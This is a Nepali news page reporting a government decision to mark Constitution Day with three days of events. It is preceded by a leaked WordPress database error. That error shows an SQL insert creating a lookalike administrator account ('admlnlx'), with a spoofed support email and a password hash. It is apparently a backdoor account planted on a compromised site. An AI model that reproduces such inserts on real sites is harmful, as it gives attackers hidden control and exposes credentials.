WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvYyi5zDtvhDG0cwpFyJOZuNSFT6Af/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 15:03:01', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सरकारले यस वर्ष तीन दिन संविधान दिवस मनाउने भएको छ ।
आईतवार प्रधानमन्त्री तथा मन्त्रीपरिषदको कार्यालय सिंहदरबारमा बसेको संविधान दिवस मुल समारोह समितिको बैठकले सो निर्णय गरेको हो ।
असोज २, ३ र ४ गते ३ दिनसम्म विभिन्न समारोहकासाथ संविधान दिवस मनाउने कार्यक्रम तय गरेको भौतिक पूर्वाधार तथा यातायातमन्त्री प्रकाश ज्वालाका बताए । असोज २ गते स्मारिक प्रकाशन, संवाद, परिसंवाद, अन्तरक्रिया कार्यक्रमहरु हुने र ३ गते सैनिक मञ्च टुँडिखेलमा विशेष समारोह गर्ने कार्यक्रम तय भएको पनि मन्त्री ज्वालालए बताए ।
ज्वालाका अनुसार विदेशस्थित राजदुतावासहरु, कुटनीतिक नियोगमा पनि यो दिवस मनाउने, तीन दिन नै बेलुका दीपावली गरेर संविधान दिवस मनाउने ।’ निर्णय गरेको बताए ।